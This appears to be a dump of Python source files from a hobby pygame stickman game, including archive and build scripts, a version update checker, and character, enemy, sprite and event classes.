import zipfile
import tarfile
import gzip
import bz2
import os
import subprocess
import shutil
import glob
import json
GIT_SCRIPT = """
git clone https://michael78912/smnw-archives
cd smnw-archives
git init
echo copying archives...
cp ../Archives/* .
git add *
git push origin master
"""
def make_xz(file, dir='.'):
"""
compresses file and saves it to
[file].xz in the dir.
"""
os.system('xz -k ' + os.path.join(dir, file))
def make_tarfile(source_dir):
with tarfile.open(source_dir + '.tar', "w") as tar:
tar.add(source_dir, arcname=os.path.basename(source_dir))
def make_gz(file, dir='.'):
os.system('gzip -k ' + file)
def make_bz2(file, dir='.'):
os.system('bzip2 -k ' + os.path.join(dir, file))
def make_zipfile(dir):
print('writing zipfile')
zipfile.main(['-c', dir + '.zip', dir])
def make_7z(dir):
print('writing 7z')
try:
os.remove('logs.7z')
except FileNotFoundError:
pass
old = os.getcwd()
os.chdir(dir)
os.system('7z a %s -r' % dir)
shutil.move('logs.7z', '..')
os.chdir(old)
def get_ver():
old_ver_file = json.load(open('/mnt/m/stickman\'s_new_world/game/config/config.json'))
old_ver = old_ver_file['version']
new_ver = input('old version: {}. new version: '.format(old_ver))
old_ver_file['version'] = new_ver
json.dump(old_ver_file, open('/mnt/m/stickman\'s_new_world/game/config/config.json', 'w'))
with open('Archives/ver.txt', 'w') as verfile:
verfile.write(new_ver)
def write_archive():
for arc in glob.glob('stickman*.*'):
os.remove(arc)
for func in (make_zipfile, make_tarfile, make_7z):
func('logs')
for arc in glob.glob('logs.*'):
os.rename(arc, 'stickman\'s new world.' + arc.split('.')[1])
for func in (make_xz, make_bz2, make_gz):
func('"stickman\'s new world.tar"')
shutil.rmtree('Archives')
os.mkdir('Archives')
for arc in glob.glob('stickman*.*'):
shutil.move(arc, 'Archives')
get_ver()
os.system('bash tmp.sh')
write_archive()
import os
file = open('compiled.py', 'w')
def f(dir='.'):
for i in os.listdir(dir):
if os.path.isdir(os.path.join(dir, i)):
f(os.path.join(dir, i))
elif i.endswith('.py'):
file.write(open(os.path.join(dir, i)).read())
f()
file.close()
from py_compile import compile as compile_py
from argparse import ArgumentParser
from json import JSONDecoder
from glob import glob
import os
import sys
__version__ = '0.0'
__author__ = 'Michael Gill'
def version():
"""
outputs version info to the screen.
"""
print('compile_all version {__version__} by {__author__}.'.format(
**globals()))
def main(
dir=os.path.abspath('.'),
outputdir='compiled',
recurse_dirs=False,
placeinsubdirs=False):
"""
compiles all files ending in .py or .pyw to
.pyc files, and places them in outputdir.
if recurse_dirs == True, then it will be done to
all subdirectories as well.
"""
try:
if glob(os.path.join(dir, '*.py')) + glob(os.path.join(dir,
'*.pyw')) == []:
print(dir + ', no python source files found!')
os.listdir(dir)
except PermissionError:
print(dir, 'permission denied!')
return
for file in os.listdir(dir):
if os.path.isdir(os.path.join(dir, file)) and recurse_dirs:
if placeinsubdirs:
new_outputdir = os.path.join(outputdir, file)
else:
new_outputdir = outputdir
print('entering', file)
main(
dir=os.path.join(dir, file),
outputdir=new_outputdir,
recurse_dirs=True,
placeinsubdirs=placeinsubdirs)
if not recurse_dirs and os.path.isdir(os.path.join(dir, file)):
continue
else:
if file.endswith(('.py', '.pyw')):
print('attempting to compile', os.path.join(dir, file))
print(
compile_py(
os.path.join(dir, file),
os.path.join(outputdir,
'.'.join(file.split('.')[:-1]) + '.pyc')),
'compiled.')
if __name__ == '__main__':
parser = ArgumentParser(
description='compiles all python files in directory.')
parser.add_argument(
'--directory',
'-d',
help='the input directory with your python files.')
parser.add_argument(
'--output-dir', '-o', help='the output directory for the files to go.')
parser.add_argument(
'--recurse-subdirs',
'-r',
help='recurse the subdirectories',
action="store_true")
parser.add_argument(
'--place-subfiles-in-subdirs',
'-p',
help='store the files from sub-directories in the equivalent sub directories. must be used with the -r option.',
action='store_true')
parser.add_argument(
'--version',
'-v',
help='output the version information and exit.',
action='store_true')
a = parser.parse_args()
if a.output_dir is None:
a.output_dir = os.path.join(os.path.abspath('.'), 'compiled')
if a.directory is None:
a.directory = os.path.abspath('.')
if a.version:
version()
else:
main(
dir=a.directory,
outputdir=a.output_dir,
recurse_dirs=a.recurse_subdirs,
placeinsubdirs=a.place_subfiles_in_subdirs,
)
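# example invocation (the file name compile_all.py is an assumption, taken from
# the "compile_all" name printed by version()):
#   python compile_all.py -d src -o compiled -r -p
# compiles every .py/.pyw under src/ into compiled/, mirroring sub-directories.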
import os
def main(dir):
for i in os.listdir(dir):
if os.path.isdir(os.path.join(dir, i)):
main(os.path.join(dir, i))
elif i.endswith('.py'):
print('formatting %s' % i)
os.system('yapf -i ' + os.path.join(dir, i))
os.system('autopep8 -i ' + os.path.join(dir, i))
if __name__ == '__main__':
main('.')
import urllib.request
import json
import os
try:
import httplib
except ImportError:
import http.client as httplib
def have_internet():
conn = httplib.HTTPConnection("www.example.com", timeout=5)
try:
conn.request("HEAD", "/")
conn.close()
return True
except OSError:
conn.close()
return False
VER_URL = "https://drive.google.com/uc?export=download&id=17KGPTgF6xWKH3dk7Sd74niL548WU6Tts"
def check_update():
data = {}
# VER_URL is a shared google drive link that has the current version of stickmanranger
with urllib.request.urlopen(VER_URL) as response:
version = response.read().decode()
# decode the current version from "settings.json"
current_version = json.JSONDecoder().decode(
open(os.path.join('config', 'windows_config.json')).read())['version']
# if the version is the same
print(current_version, version)
if current_version == version:
return False
return True
def main():
print(check_update())
if check_update():
import run_auto_install
main()
"""a file for representing an attack."""
class Attack:
def __init__(self, damage, cooldown):
self.damage = damage
self.cooldown = cooldown
def __repr__(self):
return "{}(damage={}, cooldown={})".format(self.__class__.__name__, self.damage, self.cooldown)
try:
from _internal import PICS
except ImportError:
from ._internal import PICS
class BackGroundImage:
"""
this has no effect on the stage itself,
but is just for decoration.
"""
def __init__(self, name, topright, priority=1, put_on_terrain=None):
self.topright = topright
self.image = PICS['backgrounds'][name]
self.priority = priority
try:
self.__class__.instances.append(self)
except AttributeError:
# this is the first instance
self.__class__.instances = [self]
def __del__(self):
# must remove the current instance from instances
self.__class__.instances.pop(self.__class__.instances.index(self))
def draw(self, surf):
"""
draw the image to surf
"""
surf.blit(self.image, self.topright)
@classmethod
def draw_all(cls, surf):
"""
draw all of the current instances to surf
"""
orderedpairs = sorted(
[(ins.priority, ins) for ins in cls.instances], key=lambda x: x[0])
for pair in orderedpairs:
pair[1].draw(surf)
if __name__ == '__main__':
print(BackGroundImage('hut', (0, 0)).instances)
try:
from character_image import CharacterImage
from klass import Class
except ImportError:
from .character_image import CharacterImage
from .klass import Class
class Character(Class, CharacterImage):
...
"""characters.py- a module of subclasses
each of these classes is a class of stickman from
stickmanranger.
"""
try:
from _internal import *
from klass import Class
except ImportError:
from ._internal import *
from .klass import Class
__all__ = ['Swordsman', 'Angel', 'Archer', 'Spearman', 'Wizard']
DEFAULT_STATS = (50, 0, 0, 0, 0)
class Swordsman(Class):
image = PICS['characters']['swordsman']
def __init__(self, player_num, main_game_state, weapon, stats=DEFAULT_STATS):
Class.__init__(self, 'swordsman', player_num, weapon, main_game_state, stats)
class Angel(Class):
image = PICS['characters']['angel']
def __init__(self, player_num, main_game_state, weapon, stats=DEFAULT_STATS):
Class.__init__(self, 'angel', player_num, weapon, main_game_state, stats)
class Archer(Class):
image = PICS['characters']['archer']
def __init__(self, player_num, main_game_state, weapon, stats=DEFAULT_STATS):
Class.__init__(self, 'archer', player_num, weapon, main_game_state, stats)
class Spearman(Class):
image = PICS['characters']['spearman']
def __init__(self, player_num, main_game_state, weapon, stats=DEFAULT_STATS):
Class.__init__(self, 'spearman', player_num, weapon, main_game_state, stats)
class Wizard(Class):
image = PICS['characters']['wizard']
def __init__(self, player_num, main_game_state, weapon, stats=DEFAULT_STATS):
Class.__init__(self, 'wizard', player_num, weapon, main_game_state, stats)
"""
character_image.py
this is basically a test module at this point
attempt to build the image of the character
"""
__author__ = 'Michael Gill <michaelveenstra12@gmail.com>'
__version__ = '0.0 alpha'
import random
import time
import sys
import threading
import os
from pygame.locals import *
import pygame as pg
try:
from sprite import SMRSprite
from terrain import Terrain
from _internal import PICS, COLOURS
import events
except ImportError:
from .sprite import SMRSprite
from .terrain import Terrain
from ._internal import PICS, COLOURS
import class_.events as events
FPS = 50
CLOCK = pg.time.Clock()
def draw_sword(surface, armpoint, colour, length=16):
"""draws a sword on to armpoint (armpoint == hand?)"""
colour = COLOURS[colour]
point2 = armpoint[0], armpoint[1] - length
return pg.draw.line(surface, colour, armpoint, point2)
def draw_halo(surface, headtopleft, colour):
"""draws a halo a couple pixels above headtopleft."""
colour = COLOURS[colour]
left, top = headtopleft[0] - 2, headtopleft[1] - 5
width = 8
height = 4
rect = pg.Rect(left, top, width, height)
return pg.draw.ellipse(surface, colour, rect, 1)
def draw_bow(surface, armpoint, colour):
"""draws a bow to the end of armpoint."""
# angle1, angle2 = 60, 80
# rect = pg.Rect(0, 0, 7, 12)
# rect.midleft = armpoint
# print(rect)
# pg.draw.arc(surface, colour, rect, angle1, angle2)
pic = PICS['characters_parts']['bow'][colour]
area = armpoint[0] - 2, armpoint[1] - 7
surface.blit(pic, area)
# pg.image.save(surface, r'C:\Users\Michael\desktop\test_images\thing.png')
def draw_spear(surface, armpoint, colour):
"""draws a spear onto the end of the arm."""
pic = PICS['characters_parts']['spear'][colour]
pos = armpoint[0] - 6, armpoint[1] - 10
surface.blit(pic, pos)
# pg.image.save(surface, r'C:\Users\Michael\desktop\test_images\thing.png')
return surface
def draw_wand(surface, armpoint, colour):
"""draws a wand on the end of the arm."""
draw_sword(surface, armpoint, colour, 7)
# pg.image.save(surface, r'C:\Users\Michael\desktop\test_images\thing.png')
DEFAULT_WEAPONS = {
'swordsman': draw_sword,
'angel': draw_halo,
'archer': draw_bow,
'spearman': draw_spear,
'wizard': draw_wand,
}
class CharacterImage(SMRSprite):
"""
this is a sprite that at this point, should really
just be able to move around.
"""
has_drawn = False
sizex = 7
sizey = 10
hitbox = (11, 26)
size = (sizex * 2, sizey * 2)
head_radius = 3
head_diameter = head_radius * 2
def __init__(self, type_, weapon,
pos: 'the topleft corner (in cartesian system)',
main_game_state):
SMRSprite.__init__(self, main_game_state, None, pos)
self.type_ = type_
self.weapon = weapon
self.topleft = pos
self.bottomleft = pos[0], pos[1] + self.sizey
self.topright = pos[0] + self.sizex, pos[1]
self.bottomright = pos[0] + self.sizex, pos[1] + self.sizey
def build_image(self, surface, colour, rebuild=True):
"""constructs and draws the stickman to the
screen. if rebuild is false, use the last image.
"""
if rebuild or not self.has_drawn:
self.has_drawn = True
# all these are making the right arm
rarm = [
[..., ...], [..., ...]
] # skeleton for 2D-list (First time to actually get to use Ellipsis!)
rarm[0][0] = self.topright[0] - (self.sizex // 2)
# X- coordinate should be directly on arm
rarm[0][1] = self.topright[1] - (self.sizey // 6 * 9)
# 3 quarters up the arm should be good
# exactly on edge of player's hitbox
rarm[1][0] = self.topright[0]
# randomly on the top half of hitbox
rarm[1][1] = random.randint(self.topright[1] - (self.sizey // 2),
self.topright[1])
self.rarm = rarm
self.rarm_rect = pg.draw.line(surface, colour, rarm[0],
rarm[1], 2)
# larm is basically a repeat of rarm, only a few modifications
larm = [[..., ...], [..., ...]]
# same coordinate for part that attaches to body is OK
larm[0] = rarm[0]
larm[1][0] = self.topleft[0]
larm[1][1] = random.randint(self.topleft[1] - (self.sizey // 2),
self.topright[1])
self.larm = larm
self.larm_rect = pg.draw.line(surface, colour, larm[0], larm[1], 2)
body1 = self.topright[0] - self.sizex // 2
body2 = self.topleft[1] - self.sizey
start = body1, body2
body1 = self.bottomright[0] - self.sizex // 2
body2 = self.bottomright[1] - self.sizey
end = body1, body2
self.start, self.end = start, end
self.body = pg.draw.line(surface, colour, start, end, 2)
head_center_pos = self.topright[0] - self.sizex // 2, self.topleft[1] - (
self.sizey + 2)
self.head_center = head_center_pos
self.head = {'center': head_center_pos, 'radius': self.head_radius}
self.head_rect = pg.draw.circle(surface, colour,
head_center_pos, self.head_radius, 1)
rleg = [[..., ...], [..., ...]]
rleg[0] = end
rleg[1][0] = random.randint(self.bottomleft[0],
self.sizex // 2 + self.bottomleft[0])
rleg[1][1] = self.bottomleft[1]
self.rleg = rleg
self.rleg_rect = pg.draw.line(surface, colour, rleg[0], rleg[1], 2)
lleg = [[..., ...], [..., ...]]
lleg[0] = end
lleg[1][0] = random.randint(self.bottomright[0],
self.sizex // 2 + self.bottomright[0])
lleg[1][1] = self.bottomright[1]
self.lleg = lleg
self.lleg_rect = pg.draw.line(surface, colour, lleg[0], lleg[1], 2)
else:
pg.draw.line(surface, colour, self.rarm[0], self.rarm[1], 2)
pg.draw.line(surface, colour, self.larm[0], self.larm[1], 2)
pg.draw.line(surface, colour, self.rleg[0], self.rleg[1], 2)
pg.draw.line(surface, colour, self.lleg[0], self.lleg[1], 2)
pg.draw.line(surface, colour, self.start, self.end, 2)
pg.draw.circle(surface, colour, self.head_center, self.head_radius, 1)
if self.type_ == 'angel':
draw_halo(surface, self.head_rect.topleft, self.weapon.colour)
else:
DEFAULT_WEAPONS[self.type_](surface, self.rarm[1], self.weapon.colour)
self.rect = pg.Rect(self.topright, self.hitbox)
def move_to_x(self, pos: 'x', surface, pixels=1, invisible=False):
"""
moves the character image by pixels
towards the destination.
INCOMPLETE: only X coordinates are supported
"""
current = self.topleft[0]
current_pos = current - pixels if pos < current else current + pixels
self.update_coords((current_pos, self.topleft[1]))
# self.build_image(surface)
return current_pos
def move_to_y(self, pos: 'y', surface, pixels=1, invisible=False):
current = self.topleft[1]
current_pos = current - pixels if pos < current else current + pixels
self.update_coords((self.topleft[0], current_pos))
self.build_image(surface)
return current_pos
def move_to(self, pos: 'x / y', surface, pixels=1):
coord = random.randrange(1)
func = self.move_to_y if coord == 1 else self.move_to_x
return coord, func(pos[coord], surface, pixels)
def _mainloop(self, pos, surface, pixels, invisible=False, *args,
**kwargs):
new_pos = -1 # the coordinate can never be this
at_pos = False
# at pos will keep the main loop going
while True:
if not self._internal_events.empty():
f = self._internal_events.get()
if type(f) == events.Quit:
print('return')
print('exiting')
os._exit(0)
elif type(f) == events.Pause:
if f.keep:
self.internal_event(f)
continue
if not at_pos:
new_pos = self.move_to_x(pos, surface, pixels, invisible,
*args, **kwargs)
CLOCK.tick(FPS)
if pos == new_pos:
at_pos = True
def start_thread(self, move_to, surf, pixels=1, daemon=False):
self.mainproc = threading.Thread(
target=self._mainloop, args=(move_to, surf, pixels), daemon=daemon)
self.mainproc.start()
class WeaponDummy:
def __init__(self, colour):
self.colour = colour
def __repr__(self):
return 'WeaponDummy object with Surface %s' % self.image
def main2():
s = pg.Surface((100, 100))
c = CharacterImage('swordsman', WeaponDummy('red'), (20, 20), {})
c.build_image(s, (232, 202, 145))
pg.image.save(s, r'C:\Users\Michael\Desktop\hi.png')
if __name__ == '__main__':
main2()
"""damagenumbers- an enemy will have a list of damage numbers.
it will display them all over time.
"""
import os
import random
import pygame as pg
GRAY = (220, 220, 220)
class DamageNumber:
"""display as a number coming from the enemy"""
lifespan = 60
dead = False
font = pg.font.Font(os.path.join('data', 'Roboto-Regular.ttf'), 9)
def __init__(self, enemy, damage):
"""initiate instance>"""
self.surf = self.font.render(str(damage), False, GRAY)
self.rect = self.surf.get_rect()
self.rect.center = (enemy.pos[0] + enemy.size_px // 2) + random.randint(-3, 3), enemy.pos[1] - 10
def update(self, surface):
"""update and draw to surface"""
if self.lifespan == 0:
self.dead = True
if not self.dead:
surface.blit(self.surf, self.rect)
self.rect.y = self.rect.y - 1
self.lifespan -= 1"""
drop.py
this is a base class to derive compos/weapons from (and anything I might add later ;))
definitely not to be used directly.
"""
class DropItem:
def __init__(self, smallicon, largeicon, surface, stats_to_display=''):
self.smallicon = smallicon
self.largeicon = largeicon
self.surface = surface
if isinstance(stats_to_display, dict):
self.stats_to_display = stats_to_display
elif isinstance(stats_to_display, str):
d = stats_to_display.split('\n')
stats_to_display = {}
for i in d:
stats_to_display[i.split(':')[0]] = i.split(':')[1]
self.stats_to_display = stats_to_display
def draw_large(self, pos):
"""
blits self.largeicon to surface.
"""
self.surface.blit(self.largeicon, pos)
def draw_small(self, pos):
self.surface.blit(self.smallicon, pos)
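# a small sketch of the string form of stats_to_display: "name:value" lines are
# split into a dict (the icon and surface arguments are just placeholders here).
if __name__ == '__main__':
    item = DropItem(None, None, None, 'damage:5\nrange:40')
    print(item.stats_to_display)   # {'damage': '5', 'range': '40'}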
"""enemies.py- contains enemies that are used in SMNW.
may create a separate library for these one day, but until I
decide to use something other than Blob and Stationary, I'll be fine.
"""
import random
from .enemy import Enemy
from . import terrain
__all__ = ['Blob', 'Stationary']
GRAY = (220, 220, 220)
BACKWARDS = 'backwards'
FORWARDS = 'forwards'
class Blob(Enemy):
"""
stats are as follows:
(health, EXP, GOLD, SILVER)
"""
# Blob enemy has no body
_amount = 0
body = None
chance_of_motion = 3
_damaging = -1
fell_on_last = 0
on_screen = False
intelligence = 4
def __init__(self, colour, head, drops, drop_rates, attack, health, range, size):
super().__init__()
self.colour = colour
self.health = health
self.range = range
self._num = self._amount + 1
self.__class__._amount += 1
self.head = head
self.size_px = head.size_px
self.size = size
# name is used by the game itself.
self.name = head.name + '_blob'
# pretty_name is the name that appears in the library
self.pretty_name = head.pretty_name + ' Blob'
self.drops = drops
self.drop_rates = drop_rates
self.attack = attack
# def hit(self, attack):
# super().hit(attack)
# dmg = self.damage_font.render(str(self.health), False, GRAY)
# rect = dmg.get_rect()
# rect.center = self.pos[0] + self.size_px // 2, self.pos[1] - 10
# pg.display.get_surface().blit(dmg, rect)
def __repr__(self):
return "Blob enemy type " + str(self._num)
def draw(self, coordinates, surface, colour=None):
"""draws enemy to screen at coordinates.
using cartesian system.
"""
self.on_screen = True
surface.blit(self.head.get_image(colour), coordinates)
self.pos = coordinates
def move(self, all_players, surface, terrain_obj):
# pylint: disable=too-many-locals
"""moves the enemy towards the closest player to it.
the Blob does not move too much, and has a 1/4 (intelligence)
chance of moving the way away from the players.
"""
if random.randint(1, self.chance_of_motion) == 1:
# innocent until proven guilty. (of being in a pit)
can_move = True
in_air = terrain.is_in_air(self.pos, terrain_obj, self.size_px)
current_block_x = terrain_obj.px_to_blocks(self.pos[0])
current_block_y = terrain_obj.px_to_blocks(self.pos[1])
next_column = list(terrain_obj.terrain2dlist_texts[terrain_obj.template]
['text'][:, current_block_x - 1])
top_levels = {i if obj == '*' else None for i,
obj in enumerate(next_column)}
top_levels.discard(None)
if in_air:
# fall two pixels, because enemy is in air
self.fell_on_last = 1
self.pos = self.pos[0], self.pos[1] + 2
elif self.fell_on_last == 1:
self.fell_on_last = 0
# for some strange reason that is completely beyond me,
# all enemies seem to stay 4 pixels above ground after falling.
# this fixes that.
self.pos = self.pos[0], self.pos[1] + 4
current_x = self.pos[0]
possible_destinations = [player.image.topright[0]
for player in all_players]
distances = []
for i in possible_destinations:
distances.append(current_x - i if i <=
current_x else i - current_x)
distance = min(distances)
dest = possible_destinations[distances.index(distance)]
move_proper = random.randint(1, self.intelligence) == 1
if dest >= current_x:
# greater. want to move to the right.
if move_proper:
move_right = False
self.pos = (self.pos[0] - 1, self.pos[1])
else:
move_right = True
self.pos = (self.pos[0] + 1, self.pos[1])
else:
# smaller. want to move to left.
if move_proper:
move_right = False
self.pos = (self.pos[0] + 1, self.pos[1])
else:
move_right = True
self.pos = (self.pos[0] - 1, self.pos[1])
class Stationary(Blob):
"""similar to blob, but does n ot move."""
def move(*_): pass
import os.path
import pygame as pg
from .smr_error import SMRError
from .damagenumbers import DamageNumber
class Enemy:
"""base class for stickmanranger enemies"""
id = 0
health = 0
damage_font = pg.font.Font(os.path.join('data', 'Roboto-Regular.ttf'), 9)
damage_numbers = []
dead = False
# I dont know why the hell it needs to start at -3, not 0, but it does
_enemies = -3
in_damage_state = False
pos = (0, 0)
def __init__(self):
Enemy._enemies += 1
self.id = self._enemies
def hit(self, attack):
self.health -= attack.damage
# become red for 4 frames.
self._damaging = 4
self.damage_numbers.append(DamageNumber(self, attack.damage))
def __copy__(self):
return self.__class__(
self.colour,
self.head,
self.drops,
self.drop_rates,
self.attack,
self.health,
self.range,
self.size,
)
def update(self, game_state):
self.damage_numbers = [x for x in self.damage_numbers if not x.dead]
#print(self.damage_numbers)
if not self.dead:
for i in self.damage_numbers:
i.update(game_state['MAIN_DISPLAY_SURF'])
colour = None
if self.in_damage_state:
colour = 'red'
self.in_damage_state = self._damaging >= 0
self._damaging -= 1
self.draw(self.pos, game_state['MAIN_DISPLAY_SURF'], colour)
if self.health <= 0:
i = get_enemy_by_id(game_state['_STAGE_DATA']['enemies'], self.id)
print('lol. enemy with id %s is now IN THE VOID.' % self.id)
del game_state['_STAGE_DATA']['enemies'][i]
self.dead = True
def draw(*_):
"""to be overridden"""
pass
def move(*_):
"""to be overridden (unless stationary)"""
pass
def __repr__(self):
return "{} enemy colour {} size {}".format(self.__class__.__name__, self.colour, self.size)
def get_enemy_by_id(enemies, id_):
for i,e in enumerate(enemies):
print("%s with id %s. looking for %s" % (e, e.id, id_))
if e.id == id_:
return i
raise SMRError('Enemy with id %d could not be found' % id_)
import pygame
try:
from _internal import *
except ImportError:
from ._internal import *
DEF_SIZE = 1
class EnemyHead:
cached_colours = {}
def __init__(self, type_str, colour, size=DEF_SIZE):
print(size)
self.type_str = type_str
self.colour = colour
self.size_px = size * 10
img = PICS['heads'][type_str][colour].copy()
self.head = pygame.transform.scale(img, (size * 10, size * 10))
print({100: COLOURS[' '.join(('light', colour))]})
change_alpha_to_colour(self.head, {100: COLOURS['light ' + colour]})
self.name = colour + '_' + type_str
self.pretty_name = ' '.join((colour, type_str)).title()
def get_image(self, colour_override=None):
if colour_override is None:
return self.head
# return a copy of the overridden image.
pic = PICS['heads'][self.type_str][colour_override].copy()
change_alpha_to_colour(pic, {100: COLOURS['light ' + colour_override]})
pic = pygame.transform.scale(pic, (self.size_px, self.size_px))
return pic
def main():
import pygame
image = pygame.image.load('happy.png')
pygame.image.save(image, 'purplehappy.png')
if __name__ == '__main__':
s = EnemyHead('happy', 'green')
print(vars(s))
import pygame
pygame.image.save(s.head, 'C:\\Users\\Michael\\Desktop\\head.png')
a = pygame.display.set_mode((1000, 1000))
a.fill(COLOURS['white'])
s.head.set_alpha(100)
#change_alpha_to_colour(s.head, {100: (255, 0, 0)})
a.blit(s.head, (0, 0))
pygame.display.update()
while True:
for i in pygame.event.get():
if i.type == 12:
raise SystemExit
import threading
import os
import pygame as pg
try:
from enemy_head import EnemyHead
from sprite import SMRSprite
except ImportError:
from .sprite import SMRSprite
from .enemy_head import EnemyHead
FPS = 50
CLOCK = pg.time.Clock()
class EnemyImage(SMRSprite):
def __init__(self, pos, size, colour, head_type, main_game_state,
event_queue):
SMRSprite.__init__(self, main_game_state, event_queue, pos)
head = EnemyHead(head_type, colour, size)
head_rect = head.head.get_rect()
body_size = self.get_body_size()
head_width = head_rect.width
head_height = head_rect.height
body_width = body_size.width
body_height = body_size.height
print('!!!!!!!!', colour, head)
print(locals())
real_width = body_width if body_width > head_width else head_width
real_height = body_height if body_height > head_height else head_height
self.size = (real_width, real_height)
self.update_coords(pos)
self.head = head
self.main_game_state = main_game_state
self.event_queue = event_queue
def move_to_x(self, pos, surf, pixels=1):
current = self.topleft[0]
dest = current - pixels if pos < current else current + pixels
self.update_coords((dest, self.topleft[1]))
self.draw(surf)
def draw(self, surf):
"""
since the basic class, just
blits the head to the screen.
"""
surf.blit(self.head.head, self.topleft)
def start_thread(self, pos, surf):
self.mainthread = threading.Thread(
target=self._mainloop,
args=(pos, surf),
)
self.mainthread.start()
def _mainloop(self, pos, surf):
at_pos = False
while True:
if at_pos:
continue
self.move_to_x(pos, surf)
if self.topleft[0] == pos:
at_pos = True
CLOCK.tick(FPS)
@staticmethod
def get_body_size():
return pg.Rect((0, 0), (0, 0))
if __name__ == '__main__':
d = EnemyImage((0, 0), 2, 'green', 'happy', {}, {})
s = pg.Surface((10, 10))
s.fill((255, 255, 255))
d.draw(s)
pg.image.save(s, r'C:\Users\Michael\Desktop\s.png')
s = pg.display.set_mode((500, 500))
d.start_thread(10, s)
while True:
for e in pg.event.get():
if e.type == 12:
os._exit(0)
pg.display.update()
s.fill((0, 0, 0))
CLOCK.tick(FPS)
"""
events.py
these are simple event classes for
stickman's new world.
there are 2 ways to use these.
in main_event_queue or _internal_event_queue.
in _internal_event_queue it will act in the
thread with that sprite, and in main_event_queue,
it will act in the main loop itself.
"""
class _Event:
"""
base class for the other events.
"""
def __init__(self, code=None, mode=exec):
self.code = code
self.mode = mode
def __call__(self):
self._exec()
def __repr__(self):
return '%a object at %s' % (self.__class__, hex(id(self)))
def _exec(self):
"""
to be overridden.
"""
if self.code is not None:
self.mode(self.code)
class Quit(_Event):
def __init__(self):
Quit.code = compile('import os; os._exit(0)', 'Quit Event', 'exec')
self.mode = exec
class Pause(_Event):
keep = True
class SayHello(_Event):
"""
test event.
"""
def __init__(self):
SayHello.code = compile('print("Hello!")', 'SayHello event', 'exec')
self.mode = exec
def _exec(self):
self.mode(self.code)
# print(SayHello())
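# a minimal usage sketch (not from the game itself): an event goes either on a
# sprite's _internal_events queue (handled inside that sprite's thread) or on
# the shared main event queue (handled by the main loop); calling an event
# runs its compiled code.
if __name__ == '__main__':
    from queue import Queue
    queue = Queue()
    queue.put(SayHello())
    while not queue.empty():
        queue.get()()   # prints "Hello!"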
"""
character_image.py
this is basically a test module at this point
attempt to build the image of the character
"""
__author__ = 'Michael Gill <michaelveenstra12@gmail.com>'
__version__ = '0.0 alpha'
import random
import time
import sys
import threading
import os
from pygame.locals import *
import pygame as pg
try:
from sprite import SMRSprite
from terrain import Terrain
from _internal import PICS
import events
except ImportError:
from .sprite import SMRSprite
from .terrain import Terrain
from ._internal import PICS
import class_.events as events
FPS = 50
CLOCK = pg.time.Clock()
COLOURS = {
'beige': (242, 189, 107),
'green': (0, 128, 0),
'blue': (0, 0, 128),
'red': (128, 0, 0),
'dark red': (255, 0, 0),
'dark blue': (0, 0, 255),
'dark green': (0, 255, 0),
'black': (0, 0, 0),
'aqua': (0, 255, 255),
'white': (255, 255, 255),
'teal': (0, 128, 128),
'purple': (128, 128, 0),
'dark purple': (255, 255, 0),
'yellow': (255, 255, 0),
'silver': (192, 192, 192),
'gold': (192, 192, 96),
'gray': (211, 211, 211),
}
class CharacterImage(SMRSprite):
"""
this is a sprite that at this point, should really
just be able to move around.
"""
sizex = 7
sizey = 9
size = (5, 10)
head_radius = 2
head_diameter = head_radius * 2
def __init__(self,
type_,
weapon,
pos: 'the topleft corner (in cartesian system)',
main_game_state,
event_queue):
SMRSprite.__init__(self, main_game_state, event_queue, pos)
self.type_ = type_
self.weapon = weapon
self.topleft = pos
self.bottomleft = pos[0], pos[1] + self.sizey
self.topright = pos[0] + self.sizex, pos[1]
self.bottomright = pos[0] + self.sizex, pos[1] + self.sizey
def build_image(self, surface):
"""
constructs and draws the stickman to the
screen.
"""
# this is the image of the character
mainsurf = pg.surface.Surface(self.size)
# all these are making the right arm
# skeleton for 2D-lsit (First time to actually get to use Ellipsis!)
rarm = [[..., ...], [..., ...]]
rarm[0][0] = self.topright[0] - (self.sizex // 2)
# X- coordinate should be directly on arm
rarm[0][1] = self.topright[1] - (self.sizey // 6 * 9)
# 3 quarters up the arm should be good
# exactly on edge of player's hitbox
rarm[1][0] = self.topright[0]
# randomly on the top half of hitbox
rarm[1][1] = random.randint(
self.topright[1] - (self.sizey // 2), self.topright[1])
self.rarm_rect = pg.draw.line(
surface, COLOURS['beige'], rarm[0], rarm[1])
# larm is basically a repeat of rarm, only a few modifications
larm = [[..., ...], [..., ...]]
# same coordinate for part that attaches to body is OK
larm[0] = rarm[0]
larm[1][0] = self.topleft[0]
larm[1][1] = random.randint(
self.topleft[1] - (self.sizey // 2), self.topright[1])
self.larm_rect = pg.draw.line(surface, COLOURS['beige'], *larm)
body1 = self.topright[0] - self.sizex // 2
body2 = self.topleft[1] - self.sizey
start = body1, body2
body1 = self.bottomright[0] - self.sizex // 2
body2 = self.bottomright[1] - self.sizey
end = body1, body2
self.body = pg.draw.line(surface, COLOURS['beige'], start, end, 1)
head_center_pos = self.topright[0] - \
self.sizex // 2, self.topleft[1] - (self.sizey + 2)
self.head = {'center': head_center_pos, 'radius': self.head_radius}
self.head_rect = pg.draw.circle(
surface, COLOURS['beige'], head_center_pos, self.head_radius, 1)
rleg = [[..., ...], [..., ...]]
rleg[0] = end
rleg[1][0] = random.randint(
self.bottomleft[0], self.sizex // 2 + self.bottomleft[0])
rleg[1][1] = self.bottomleft[1]
self.rleg = rleg
self.rleg_rect = pg.draw.line(surface, COLOURS['beige'], *rleg)
lleg = [[..., ...], [..., ...]]
lleg[0] = end
lleg[1][0] = random.randint(
self.bottomright[0], self.sizex // 2 + self.bottomright[0])
lleg[1][1] = self.bottomright[1]
self.lleg = lleg
self.lleg_rect = pg.draw.line(surface, COLOURS['beige'], *lleg)
def move_to_x(self, pos: 'x', surface, pixels=1, invisible=False):
"""
moves the character image by pixels
towards the destination.
INCOMPLETE: only X coordinates are supported
"""
current = self.topleft[0]
current_pos = current - pixels if pos < current else current + pixels
print(current_pos)
self.update_coords((current_pos, self.topleft[1]))
self.build_image(surface)
return current_pos
def move_to_y(self, pos: 'y', surface, pixels=1, invisible=False):
current = self.topleft[1]
current_pos = current - pixels if pos < current else current + pixels
print(current_pos)
self.update_coords((self.topleft[0], current_pos))
self.build_image(surface)
return current_pos
def move_to(self, pos: 'x / y', surface, pixels=1):
coord = random.randrange(1)
func = self.move_to_y if coord == 1 else self.move_to_x
return coord, func(pos[coord], surface, pixels)
def _mainloop(self, pos, surface, pixels, invisible=False, *args, **kwargs):
new_pos = [-1, -1] # the coordinate can never be this
at_pos = False
# at pos will keep the main loop going
while True:
if not self._internal_events.empty():
f = self._internal_events.get()
f()
